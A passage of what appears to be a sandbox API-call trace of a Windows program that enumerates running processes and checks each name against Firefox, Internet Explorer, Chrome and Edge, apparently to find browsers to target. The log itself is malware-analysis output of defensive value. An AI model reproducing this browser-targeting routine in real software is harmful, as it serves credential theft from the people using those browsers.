lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x36c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x22, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0195.441] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0195.441] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0195.441] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0195.441] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0195.441] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x2cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0195.441] lstrcmpiA (lpString1="audiodg.exe", lpString2="firefox.exe") returned -1 [0195.441] lstrcmpiA (lpString1="audiodg.exe", lpString2="iexplore.exe") returned -1 [0195.441] lstrcmpiA (lpString1="audiodg.exe", lpString2="chrome.exe") returned -1 [0195.441] lstrcmpiA (lpString1="audiodg.exe", lpString2="microsoftedgecp.exe") returned -1 [0195.441] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0195.442] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0195.442] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0195.442] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0195.442] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0195.442] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x124, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0195.442] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0195.442] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0195.443] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0195.443] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0195.443] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x448, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x334, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0195.443] lstrcmpiA (lpString1="dwm.exe", lpString2="firefox.exe") returned -1 [0195.443] lstrcmpiA (lpString1="dwm.exe", lpString2="iexplore.exe") returned -1 [0195.443] lstrcmpiA (lpString1="dwm.exe", lpString2="chrome.exe") returned 1 [0195.443] lstrcmpiA (lpString1="dwm.exe", lpString2="microsoftedgecp.exe") returned -1 [0195.443] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0195.444] lstrcmpiA (lpString1="spoolsv.exe", lpString2="firefox.exe") returned 1 [0195.444] lstrcmpiA (lpString1="spoolsv.exe", lpString2="iexplore.exe") returned 1 [0195.444] lstrcmpiA (lpString1="spoolsv.exe", lpString2="chrome.exe") returned 1 [0195.444] lstrcmpiA (lpString1="spoolsv.exe", lpString2="microsoftedgecp.exe") returned 1 [0195.444] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0195.444] lstrcmpiA (lpString1="taskhost.exe", lpString2="firefox.exe") returned 1 [0195.444] lstrcmpiA (lpString1="taskhost.exe", lpString2="iexplore.exe") returned 1 [0195.444] lstrcmpiA (lpString1="taskhost.exe", lpString2="chrome.exe") returned 1 [0195.444] lstrcmpiA (lpString1="taskhost.exe", lpString2="microsoftedgecp.exe") returned 1 [0195.444] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0195.445] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0195.445] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0195.445] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0195.445] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0195.445] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0195.445] lstrcmpiA (lpString1="taskeng.exe", lpString2="firefox.exe") returned 1 [0195.445] lstrcmpiA (lpString1="taskeng.exe", lpString2="iexplore.exe") returned 1 [0195.445] lstrcmpiA (lpString1="taskeng.exe", lpString2="chrome.exe") returned 1 [0195.446] lstrcmpiA (lpString1="taskeng.exe", lpString2="microsoftedgecp.exe") returned 1 [0195.446] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="abortion-serbia-effect.exe")) returned 1 [0195.446] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="firefox.exe") returned -1 [0195.446] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="iexplore.exe") returned -1 [0195.446] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="chrome.exe") returned -1 [0195.446] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="microsoftedgecp.exe") returned -1 [0195.446] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x62c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="beverages-tapes-dod.exe")) returned 1 [0195.447] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="firefox.exe") returned -1 [0195.447] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="iexplore.exe") returned -1 [0195.447] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="chrome.exe") returned -1 [0195.447] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="microsoftedgecp.exe") returned -1 [0195.447] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="receptor paintings.exe")) returned 1 [0195.447] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="firefox.exe") returned 1 [0195.447] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="iexplore.exe") returned 1 [0195.447] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="chrome.exe") returned 1 [0195.447] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="microsoftedgecp.exe") returned 1 [0195.447] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x780, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="definitely.exe")) returned 1 [0195.448] lstrcmpiA (lpString1="definitely.exe", lpString2="firefox.exe") returned -1 [0195.448] lstrcmpiA (lpString1="definitely.exe", lpString2="iexplore.exe") returned -1 [0195.448] lstrcmpiA (lpString1="definitely.exe", lpString2="chrome.exe") returned 1 [0195.448] lstrcmpiA (lpString1="definitely.exe", lpString2="microsoftedgecp.exe") returned -1 [0195.448] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x240, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="knewdifferenceskaren.exe")) returned 1 [0195.448] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="firefox.exe") returned 1 [0195.448] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="iexplore.exe") returned 1 [0195.448] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="chrome.exe") returned 1 [0195.448] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="microsoftedgecp.exe") returned -1 [0195.448] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x2c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="whenever.exe")) returned 1 [0195.449] lstrcmpiA (lpString1="whenever.exe", lpString2="firefox.exe") returned 1 [0195.449] lstrcmpiA (lpString1="whenever.exe", lpString2="iexplore.exe") returned 1 [0195.449] lstrcmpiA (lpString1="whenever.exe", lpString2="chrome.exe") returned 1 [0195.449] lstrcmpiA (lpString1="whenever.exe", lpString2="microsoftedgecp.exe") returned 1 [0195.449] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x310, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="potentially.exe")) returned 1 [0195.449] lstrcmpiA (lpString1="potentially.exe", lpString2="firefox.exe") returned 1 [0195.450] lstrcmpiA (lpString1="potentially.exe", lpString2="iexplore.exe") returned 1 [0195.450] lstrcmpiA (lpString1="potentially.exe", lpString2="chrome.exe") returned 1 [0195.450] lstrcmpiA (lpString1="potentially.exe", lpString2="microsoftedgecp.exe") returned 1 [0195.450] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x314, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="seeker.exe")) returned 1 [0195.450] lstrcmpiA (lpString1="seeker.exe", lpString2="firefox.exe") returned 1 [0195.450] lstrcmpiA (lpString1="seeker.exe", lpString2="iexplore.exe") returned 1 [0195.450] lstrcmpiA (lpString1="seeker.exe", lpString2="chrome.exe") returned 1 [0195.450] lstrcmpiA (lpString1="seeker.exe", lpString2="microsoftedgecp.exe") returned 1 [0195.450] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x320, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="objects-virus-israeli.exe")) returned 1 [0195.451] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="firefox.exe") returned 1 [0195.451] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="iexplore.exe") returned 1 [0195.451] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="chrome.exe") returned 1 [0195.451] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="microsoftedgecp.exe") returned 1 [0195.451] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="birth bean.exe")) returned 1 [0195.451] lstrcmpiA (lpString1="birth bean.exe", lpString2="firefox.exe") returned -1 [0195.451] lstrcmpiA (lpString1="birth bean.exe", lpString2="iexplore.exe") returned -1 [0195.451] lstrcmpiA (lpString1="birth bean.exe", lpString2="chrome.exe") returned -1 [0195.451] lstrcmpiA (lpString1="birth bean.exe", lpString2="microsoftedgecp.exe") returned -1 [0195.451] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x688, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="ruby.exe")) returned 1 [0195.452] lstrcmpiA (lpString1="ruby.exe", lpString2="firefox.exe") returned 1 [0195.452] lstrcmpiA (lpString1="ruby.exe", lpString2="iexplore.exe") returned 1 [0195.452] lstrcmpiA (lpString1="ruby.exe", lpString2="chrome.exe") returned 1 [0195.452] lstrcmpiA (lpString1="ruby.exe", lpString2="microsoftedgecp.exe") returned 1 [0195.452] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="zoodiffer.exe")) returned 1 [0195.452] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="firefox.exe") returned 1 [0195.452] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="iexplore.exe") returned 1 [0195.452] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="chrome.exe") returned 1 [0195.452] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="microsoftedgecp.exe") returned 1 [0195.452] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="smith.exe")) returned 1 [0195.453] lstrcmpiA (lpString1="smith.exe", lpString2="firefox.exe") returned 1 [0195.453] lstrcmpiA (lpString1="smith.exe", lpString2="iexplore.exe") returned 1 [0195.453] lstrcmpiA (lpString1="smith.exe", lpString2="chrome.exe") returned 1 [0195.453] lstrcmpiA (lpString1="smith.exe", lpString2="microsoftedgecp.exe") returned 1 [0195.453] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x58c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="spicedespite.exe")) returned 1 [0195.454] lstrcmpiA (lpString1="spicedespite.exe", lpString2="firefox.exe") returned 1 [0195.454] lstrcmpiA (lpString1="spicedespite.exe", lpString2="iexplore.exe") returned 1 [0195.454] lstrcmpiA (lpString1="spicedespite.exe", lpString2="chrome.exe") returned 1 [0195.454] lstrcmpiA (lpString1="spicedespite.exe", lpString2="microsoftedgecp.exe") returned 1 [0195.454] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x644, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="wooden.exe")) returned 1 [0195.454] lstrcmpiA (lpString1="wooden.exe", lpString2="firefox.exe") returned 1 [0195.454] lstrcmpiA (lpString1="wooden.exe", lpString2="iexplore.exe") returned 1 [0195.454] lstrcmpiA (lpString1="wooden.exe", lpString2="chrome.exe") returned 1 [0195.454] lstrcmpiA (lpString1="wooden.exe", lpString2="microsoftedgecp.exe") returned 1 [0195.454] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="dallasr.exe")) returned 1 [0195.455] lstrcmpiA (lpString1="dallasr.exe", lpString2="firefox.exe") returned -1 [0195.455] lstrcmpiA (lpString1="dallasr.exe", lpString2="iexplore.exe") returned -1 [0195.455] lstrcmpiA (lpString1="dallasr.exe", lpString2="chrome.exe") returned 1 [0195.455] lstrcmpiA (lpString1="dallasr.exe", lpString2="microsoftedgecp.exe") returned -1 [0195.455] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="bags shakira tourism.exe")) returned 1 [0195.455] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="firefox.exe") returned -1 [0195.455] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="iexplore.exe") returned -1 [0195.455] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="chrome.exe") returned -1 [0195.455] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="microsoftedgecp.exe") returned -1 [0195.455] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="constadvertisement.exe")) returned 1 [0195.456] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="firefox.exe") returned -1 [0195.456] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="iexplore.exe") returned -1 [0195.456] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="chrome.exe") returned 1 [0195.456] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="microsoftedgecp.exe") returned -1 [0195.456] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x2ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="sensors-democrat.exe")) returned 1 [0195.456] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="firefox.exe") returned 1 [0195.456] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="iexplore.exe") returned 1 [0195.456] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="chrome.exe") returned 1 [0195.456] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="microsoftedgecp.exe") returned 1 [0195.456] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="doctrine alcohol.exe")) returned 1 [0195.457] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="firefox.exe") returned -1 [0195.457] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="iexplore.exe") returned -1 [0195.457] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="chrome.exe") returned 1 [0195.457] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="microsoftedgecp.exe") returned -1 [0195.457] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x53c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="population openings.exe")) returned 1 [0195.458] lstrcmpiA (lpString1="population openings.exe", lpString2="firefox.exe") returned 1 [0195.458] lstrcmpiA (lpString1="population openings.exe", lpString2="iexplore.exe") returned 1 [0195.458] lstrcmpiA (lpString1="population openings.exe", lpString2="chrome.exe") returned 1 [0195.458] lstrcmpiA (lpString1="population openings.exe", lpString2="microsoftedgecp.exe") returned 1 [0195.458] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x6b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0195.458] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="firefox.exe") returned 1 [0195.458] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="iexplore.exe") returned 1 [0195.458] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="chrome.exe") returned 1 [0195.458] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="microsoftedgecp.exe") returned 1 [0195.458] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0195.459] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0195.459] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0195.459] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0195.459] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0195.459] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0195.459] lstrcmpiA (lpString1="sppsvc.exe", lpString2="firefox.exe") returned 1 [0195.459] lstrcmpiA (lpString1="sppsvc.exe", lpString2="iexplore.exe") returned 1 [0195.459] lstrcmpiA (lpString1="sppsvc.exe", lpString2="chrome.exe") returned 1 [0195.459] lstrcmpiA (lpString1="sppsvc.exe", lpString2="microsoftedgecp.exe") returned 1 [0195.459] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0195.460] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0195.460] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0195.460] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0195.460] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0195.460] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0195.460] lstrcmpiA (lpString1="taskhost.exe", lpString2="firefox.exe") returned 1 [0195.460] lstrcmpiA (lpString1="taskhost.exe", lpString2="iexplore.exe") returned 1 [0195.460] lstrcmpiA (lpString1="taskhost.exe", lpString2="chrome.exe") returned 1 [0195.460] lstrcmpiA (lpString1="taskhost.exe", lpString2="microsoftedgecp.exe") returned 1 [0195.460] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb84, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0195.461] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0195.461] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0195.461] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0195.461] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0195.461] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbdc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1c, th32ParentProcessID=0x1b0, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0195.462] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0195.462] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0195.462] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0195.462] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0195.462] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x790, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0195.462] lstrcmpiA (lpString1="taskeng.exe", lpString2="firefox.exe") returned 1 [0195.462] lstrcmpiA (lpString1="taskeng.exe", lpString2="iexplore.exe") returned 1 [0195.462] lstrcmpiA (lpString1="taskeng.exe", lpString2="chrome.exe") returned 1 [0195.462] lstrcmpiA (lpString1="taskeng.exe", lpString2="microsoftedgecp.exe") returned 1 [0195.462] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x6ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0195.463] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="firefox.exe") returned 1 [0195.463] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="iexplore.exe") returned 1 [0195.463] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="chrome.exe") returned 1 [0195.463] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="microsoftedgecp.exe") returned 1 [0195.463] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x92c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0195.508] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0195.508] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0195.508] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0195.508] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0195.508] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x924, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, 